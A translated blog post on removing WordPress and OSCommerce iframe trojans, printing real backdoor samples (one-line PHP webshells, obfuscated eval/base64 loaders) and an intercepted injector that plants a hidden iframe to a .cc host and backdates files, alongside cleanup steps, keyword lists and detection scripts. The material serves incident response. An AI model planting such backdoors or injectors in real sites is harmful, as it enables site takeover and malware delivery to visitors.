Forfly 翔!
Mr. Le's personal blog: life, love and other things. Life is like a journey; what matters is not the destination but the scenery along the way!
All Rights reserved by Mr. Le

Solutions for the WordPress iframe trojan

This WordPress iframe trojan is really nasty: once a site is infected it is very hard to remove. So develop good habits and back up regularly.

Here I repost and translate two English articles on dealing with the iframe trojan, for reference.

1. eval(base64_decode()) PHP virus

Original English link: http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus

  • Take the whole site offline. Edit the .htaccess file to block everyone else so you can examine the logs and so on. Add the following to .htaccess:
    order deny,allow
    deny from all
    allow from !! YOUR IP ADDRESS HERE !!
  • Download a copy of the entire site.
  • Install a file comparison tool; WinMerge is recommended.
  • Run the file comparison tool.
  • Find the files that differ and deal with them. This step is critical: the differing files are probably the ones the hacker modified.
  • Check all of your passwords, including FTP, cPanel, etc.
  • Check that the site works, then reopen it.
  • Open the doors again, mainly by restoring the .htaccess file.
  • Consider automated detection methods.
  • Back up regularly.
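The "download a copy, compare it against a known-good copy, and inspect the differing files" step can be done without a GUI tool. The following is an added example, not code from the Stack Overflow answer or from this blog: a hash-based comparison of two directory trees. Both trees are constructed inside the script from sample file contents so it runs offline; on a real site you would point compare_trees() at the clean backup and the freshly downloaded copy.

```python
"""Compare a downloaded copy of a site against a known-clean backup (hash-based)."""
import hashlib
import os
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _index(root):
    """Map relative path -> sha256 for every regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = _sha256(full)
    return out


def compare_trees(clean_root, live_root):
    """Return files that are new, modified or missing in the live copy."""
    clean, live = _index(clean_root), _index(live_root)
    return {
        "added": sorted(p for p in live if p not in clean),
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "removed": sorted(p for p in clean if p not in live),
    }


# Constructed sample trees: a clean backup and an infected copy of the same site.
CLEAN_FILES = {
    "index.php": "<?php\n/** WordPress front controller */\nrequire 'wp-blog-header.php';\n",
    "wp-content/themes/default/footer.php": "<?php wp_footer(); ?>\n</body></html>\n",
    "wp-content/themes/default/style.css": "body { margin: 0; }\n",
}
LIVE_FILES = dict(CLEAN_FILES)
# Theme footer tampered with, a backdoor dropped into images/, style.css deleted.
LIVE_FILES["wp-content/themes/default/footer.php"] = (
    "<?php eval(gzinflate(base64_decode('CONSTRUCTED_BLOB'))); ?>\n"
    "<?php wp_footer(); ?>\n</body></html>\n"
)
LIVE_FILES["wp-content/themes/default/images/imageth.php"] = (
    "<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc'])); ?>\n"
)
del LIVE_FILES["wp-content/themes/default/style.css"]


def _write_tree(root, files):
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(body)


def run_demo():
    """Build both constructed trees in a temp dir and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = os.path.join(tmp, "backup"), os.path.join(tmp, "download")
        _write_tree(clean, CLEAN_FILES)
        _write_tree(live, LIVE_FILES)
        return compare_trees(clean, live)


if __name__ == "__main__":
    for kind, paths in run_demo().items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

Everything listed under "added" and "modified" is what a reviewer opens first; "removed" catches files the attacker deleted to break something or hide tracks.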

The above is only a rough translation without the specifics, but the approach is right.

2. Versatile .cc attacks

Original URL: http://blog.unmaskparasites.com/2011/03/02/versatile-cc-attacks/. I think this article is good. I will not translate the first part; I go straight to translating the solution.

2.1 Characteristics of the virus

2.1.1 The malicious sites usually use .cc top-level domains, mainly *.co.cc, *.cz.cc and *.vv.cc. Anyone can register these domains for free. Since the hackers use randomly generated strings as domain names, they do not worry about the names being meaningless.

2.1.2 The hackers usually inject malicious code (HTML, JavaScript or PHP) that redirects the site to a different malicious domain every day.

2.1.3 Legitimate files that were tampered with do not reveal the hackers' modifications in their file metadata; they are usually mode 644 (only the hackers themselves can change them).

2.1.4 Removing the malicious code from your site's files is not enough: a few hours later new malicious code is injected into your pages again. Sometimes it is injected in different places, which makes checking and automated removal quite difficult.

Attack Vector

During the last couple of weeks, I talked to many webmasters and hosting providers (special thanks to Michael Karr and Benjamin Davis from HostGator) and now have quite a complete picture of these .CC attacks.

Step 1: compromise the site by exploiting vulnerabilities in common web applications to upload backdoor files.

Step 2: use the backdoor to compromise the site further. This includes injecting malicious code into legitimate files, creating more backdoor files (including injecting backdoors into legitimate PHP files), and compromising other sites under the same account.

Backdoors

Backdoor files can be scattered across the whole server account, but they are usually found in static directories such as "images" and "css" (for example imageth.php inside an images folder), and often in directories holding admin code. In WordPress, backdoor scripts are most easily injected into the themes and plugins directories.

Samples:

googlef0ee9bc90f224b30.php in the root directory of OSCommerce sites. The file name may differ, but they all resemble Google's site verification file, except that .php replaces .TXT.

<?php if(isset($_GET["797f0ee9bc90f224b30494aff31cb9"])){
$auth_pass="";
$color="#df5";
$default_action="FilesMan";
$default_charset="Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x2…skipped…='\x29\x29\x29\x3B",".");
} ?>

or:

<?php $D=strrev('edoced_46esab');$s=gzinflate($D('7X1te…skipped…+Dw==')));create_function('',"}$s//"); ?>

img/index.php under the WordPress themes directory:

<?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) { … preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), …. } eval(T7FC56270E7A70FA81A5935B72EACBE29("QAAAPD…skipped…HrDdsw==")); ?>

foot.php under the WordPress themes directory:

<?php eval(@gzinflate(base64_decode('vP1rc+pItyaKfu9fUT…skipped…Amdfy+/vvf//1vf/vP//63/wE='))); ?>

functions.php under the WordPress themes directory:

<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
.
// This file is part of the Carrington Text Theme for WordPress

404.php under the WordPress themes directory:

<?php $_POST["12"] && exit(@eval(@gzinflate(@base64_decode($_POST["12"])))); if(isset($_COOKIE["ln"])) { $sh = "7b1r…skipped…=";exit(@eval(@gzinflate(@base64_decode($sh)))); } ?><?php
/**
* @package WordPress
* @subpackage Default_Theme
*/

index.php:

eval(gzinflate(base64_decode('7P37ehq58igM…skipped…a3TC11S/OK//Aw==')));

Functionality

To check what exactly hackers do with those backdoors, folks at HostGator hijacked one of such files and intercepted the code that cybercriminals wanted to execute on a compromised server:

<?php
error_reporting(0);set_time_limit(0);
$paths = '/home/redacted/public_html/redacted.com/index.html | /home/redacted/public_html/www.redacted.com/index.php | /home/redacted/public_html/redacted/index.php';
$paths = explode(' | ',$paths);
$frame_old='# *(eval\(base64_decode\(.+\)\);)|(<iframe.+</iframe>)#i';
$frame_new_php='eval(base64_decode(\'ZXJyb3JfcmVwb3J...skipped...w0KfQ==\'));';
$frame_new_htm = '<i frame src="hxxp://hgerwhu45 .co .cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
foreach($paths as $path) {
$path = trim($path);
if(!is_writable($path)) continue;
$filetime=filemtime ($path);
$fd=fopen($path,"r");
$buffer=fread($fd, filesize($path));
fclose($fd);
$buffer=preg_replace($frame_old,'',$buffer);
if (strpos($path,'.php')!==false)
$buffer=preg_replace('#<\?php#i', '<?php '.$frame_new_php , $buffer , 1);
else
$buffer=preg_replace('#<body[^>]*>#i', '\\0'.$frame_new_htm , $buffer , 1);
$fd=fopen($path, "w");
fwrite($fd, $buffer);
fclose($fd);
touch($path , $filetime);
}
die('1111CHECKSTRING1111');
?>

As you can see:

  • this code searches for writable index files (index.html and index.php) and then tries to remove the previous copy of the malicious code and inject a new revision. Note, the code is executed with the site owner's permissions, so every file with 644 permissions is writable.
  • It injects an invisible .cc iframe HTML code into .html files and an obfuscated PHP code (that injects the same iframe plus some anti-bot logic) into .php files.
  • it preserves the modification date.
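The last point matters for triage: touch($path, $filetime) restores the old mtime so the rewritten index file looks untouched in a directory listing. It cannot restore ctime (the inode change time), which the kernel updates on every write and on the touch itself, so a ctime well after mtime is worth a look. The script below is an added example, not code from the article or from HostGator; it builds a constructed scenario in a temp directory (write a file, append to it, then backdate its mtime the way the intercepted script does) and lists files whose ctime trails their mtime. A chmod, chown or restore from backup also bumps ctime, so hits are files to inspect, not proof of tampering, and the check assumes Unix stat semantics.

```python
"""Spot files whose modification time was backdated (ctime trailing mtime)."""
import os
import tempfile
import time


def backdated_files(root, min_gap_seconds=60):
    """Return sorted (relative_path, ctime - mtime) for files whose ctime trails mtime."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            gap = st.st_ctime - st.st_mtime   # utime() cannot set st_ctime
            if gap >= min_gap_seconds:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hits.append((rel, gap))
    return sorted(hits)


def run_demo():
    """Constructed scenario: rewrite index.php, then reset its mtime like the malware does."""
    with tempfile.TemporaryDirectory() as tmp:
        index_php = os.path.join(tmp, "index.php")
        untouched = os.path.join(tmp, "style.css")
        with open(untouched, "w") as f:
            f.write("body { margin: 0; }\n")
        with open(index_php, "w") as f:
            f.write("<?php /* original front controller */ ?>\n")
        # Pretend the file's real last edit was a month ago.
        old_mtime = time.time() - 30 * 86400
        # Attacker-style edit followed by the equivalent of PHP touch($path, $filetime):
        with open(index_php, "a") as f:
            f.write("<!-- injected content -->\n")
        os.utime(index_php, (old_mtime, old_mtime))   # mtime goes back, ctime stays "now"
        return [path for path, _gap in backdated_files(tmp)]


if __name__ == "__main__":
    print(run_demo())   # style.css is not listed; index.php is
```

Run it over the document root and compare the hits with the "modified" list from a backup comparison; a file that hashes differently from the backup yet carries an old mtime is exactly the pattern this script reproduces.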

To webmasters:

1. Find and remove all backdoor scripts.

Ideally, all your server files are under some revision control, and all you need to do is check for the latest changes (which will show you all changed/created files) and then discard all unauthorized modifications.

Alternatively, scan all your server files for the following strings: "eval", "base64_decode", "edoced_46esab", "gzinflate", "gzuncompress", "eval(stripslashes", "FilesMan". Sometimes legitimate files can use these keywords, so make sure to check the found files manually. Here are some good signs that the code is not legitimate:

  • Obfuscation: long strings of unreadable characters.
    example: eval(@gzinflate(base64_decode('vP1rc+pItyaKfu9fUTti7b3e1W…
  • Using the eval function to execute code that comes directly from user input.
    example: eval(stripslashes($_REQUEST['asc']))
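A scanner that applies the string list and the two signs above can be small. The script below is an added example, not the article's tool: it greps for the article's keywords, then raises a file to "likely backdoor" only when a heuristic also fires (a long base64-looking blob, a run of \x-escaped bytes, eval fed from a superglobal, or preg_replace with the /e modifier that the FilesMan sample relies on). SAMPLES are constructed file contents modelled on the snippets quoted above, with the blobs shortened and invented; scan_tree() runs the same check over a real directory.

```python
"""Keyword-and-heuristic scan of PHP files for backdoor indicators."""
import os
import re

# Strings the article says to search for; a hit alone is only a reason to look.
KEYWORDS = ("eval", "base64_decode", "edoced_46esab", "gzinflate",
            "gzuncompress", "eval(stripslashes", "FilesMan")

# Heuristics that turn a keyword hit into a strong signal.
HEURISTICS = {
    "obfuscated blob": re.compile(r"[A-Za-z0-9+/=]{60,}"),
    "hex-escaped string": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}"),
    "eval of user input": re.compile(
        r"eval\s*\(.*?\$_(?:GET|POST|REQUEST|COOKIE)\b", re.S),
    "preg_replace /e": re.compile(
        r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]"),
}


def scan_source(text):
    """Return {'keywords': [...], 'signals': [...]} for one file's contents."""
    keywords = [k for k in KEYWORDS if k in text]
    signals = [name for name, rx in HEURISTICS.items() if rx.search(text)]
    return {"keywords": keywords, "signals": signals}


def verdict(report):
    """'inspect' on a keyword hit alone; 'likely backdoor' when a heuristic also fires."""
    if report["signals"]:
        return "likely backdoor"
    return "inspect" if report["keywords"] else "clean"


def scan_tree(root, exts=(".php", ".js", ".htaccess")):
    """Run scan_source over every matching file under root."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as f:
                    results[os.path.relpath(full, root)] = scan_source(f.read())
    return results


# Constructed samples (blobs shortened/invented) standing in for files on disk.
SAMPLES = {
    "themes/x/functions.php":
        "<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n"
        "// This file is part of the Carrington Text Theme for WordPress\n",
    "themes/x/foot.php":
        "<?php eval(@gzinflate(base64_decode('" + "vP1rc+pItyaKfu9fUTti7b3e1W" * 4
        + "'))); ?>\n",
    "googlef0ee9bc90f224b30.php":
        "<?php $default_action=\"FilesMan\";\n"
        "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\",\".\"); ?>\n",
    "wp-includes/legit.php":
        "<?php\n// genuine use: decode a short token sent by a client\n"
        "$token = base64_decode($_GET['t']);\nif (strlen($token) !== 16) exit;\n",
    "themes/x/header.php":
        "<?php get_header(); ?><html><body>\n",
}


def run_demo():
    return {name: verdict(scan_source(src)) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, v in run_demo().items():
        print(f"{v:16s} {name}")
```

The legit.php sample is the caveat from the text in code form: it contains base64_decode, so it is reported for manual inspection, but nothing in it is obfuscated and no eval is involved, so it is not escalated.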

One more way to find backdoor scripts is to scan raw web server logs for suspicious POST requests. In a normal web application there shouldn't be many files that process POST requests, so it won't take long to filter out the legitimate files.
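The log check is easy to automate once you know which paths legitimately accept POSTs. The following is an added example, not from the article: it parses Apache combined-format lines, keeps only POST requests, drops an assumed allow-list of stock WordPress POST handlers (KNOWN_POST_TARGETS, which you would extend with your own forms), and reports every other path together with the client addresses that posted to it. LOG_LINES are constructed entries using RFC 5737 documentation addresses.

```python
"""Find backdoor candidates from POST requests in raw Apache access logs."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed allow-list of files that legitimately receive POSTs on a stock WordPress site.
KNOWN_POST_TARGETS = {
    "/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php",
    "/wp-admin/admin-ajax.php", "/wp-admin/post.php",
}


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string
    return rec


def suspicious_posts(lines):
    """Return {path: {'count': n, 'ips': [...]}} for POSTs to paths outside the allow-list."""
    seen = defaultdict(lambda: {"count": 0, "ips": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] in KNOWN_POST_TARGETS:
            continue
        seen[rec["path"]]["count"] += 1
        seen[rec["path"]]["ips"].add(rec["ip"])
    return {p: {"count": v["count"], "ips": sorted(v["ips"])} for p, v in seen.items()}


# Constructed log lines (documentation IP ranges, made-up timestamps).
LOG_LINES = [
    '203.0.113.5 - - [02/Mar/2011:10:14:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Mar/2011:10:14:09 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [02/Mar/2011:10:20:44 +0000] "POST /wp-content/themes/default/images/imageth.php HTTP/1.1" 200 20 "-" "-"',
    '198.51.100.23 - - [02/Mar/2011:10:20:45 +0000] "POST /wp-content/themes/default/404.php HTTP/1.1" 200 20 "-" "-"',
    '198.51.100.99 - - [02/Mar/2011:11:02:10 +0000] "POST /wp-content/themes/default/images/imageth.php HTTP/1.1" 200 20 "-" "-"',
    '192.0.2.7 - - [02/Mar/2011:11:30:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


def run_demo():
    return suspicious_posts(LOG_LINES)


if __name__ == "__main__":
    for path, info in run_demo().items():
        print(f"{info['count']:4d}  {path}  from {', '.join(info['ips'])}")
```

A POST to a file inside a theme's images directory, or to a theme's 404.php, has no legitimate reason to exist and points straight at the files to open; with a real log you would read the file with `open("/var/log/apache2/access_log")` in place of LOG_LINES.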

2. Prevent reinfection

Now that you've found and removed the backdoor scripts, you should make sure that hackers can't upload and use new malicious files.

Step #1. Upgrade all third-party applications to their latest versions on all of your websites.

Step #2. Make sure web applications are properly configured and hardened.

Here are some resources on hardening WordPress:

http://codex.wordpress.org/Hardening_WordPress

and OSCommerce:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

Note that in the case of OSCommerce, hackers like to use vulnerabilities in "/admin/file_manager.php" and "/admin/categories.php". So Step #3 is to protect the site's admin interface. For example, you can password-protect access to this directory (.htaccess + .htpasswd) or restrict access to trusted IPs only (.htaccess).

Step #4. Since hackers like to upload backdoor scripts to images directories, you might want to configure directories with static content so that no files there can execute PHP code. For example, you can try this directive in a .htaccess file:

php_flag engine off

or these (depending on your server configuration):

RemoveHandler .php
RemoveType .php

3. Remove malicious code from your web pages

If you have a fresh, clean backup copy of your site, you can just remove everything and then restore the whole site from that backup.

It is also very simple if your site is under revision control: just revert it to a known clean state.

Otherwise, you'll need to clean files manually one by one. You should pay special attention to all index files (index.html, index.php, etc.), JavaScript files (.js) and .htaccess files.

4. Request a malware review if your site is blacklisted

To unblock your sites, you should explicitly request a malware review via Google Webmaster Tools (Diagnostics -> Malware) for each blacklisted site individually. It will take about one day to review and remove malware warnings if your sites are found clean.

Note, without this request, it may take several weeks to unblock your sites even if they are clean.

Summary

This looks like a most versatile malware attack that I’ve ever seen:

  • They use multiple vulnerabilities in multiple web applications (e.g. OSCommerce, WordPress, Joomla, SohoLaunch, etc.)
  • They inject different types of malicious code (HTML and PHP) into different type of files (.html, .php, .js)
  • They even use .htaccess files to make PHP code in .js files executable.
  • On the same site, they may change injection types almost every day.
  • And of course, they change malicious domains every day (as many other malware attacks though)

As a result, these .cc attacks target more sites than other typical attacks that only use vulnerabilities of a single application. Plus, compromise detection and clean-up can be complicated by the unpredictability of the malware injections, both their type and their location.

Have your say

Please, let me know if I missed any important details about these .cc attacks. Maybe you've come across different types of malicious content or infection vectors that you think can be related to what I described here. Your comments are welcome.

I did not translate the rest, which is not essential, but I trust everyone already knows how to proceed. Since this is a translation of the original article, please credit the source when reposting. Thanks for reading; leave a comment if you have questions.

2011-06-02
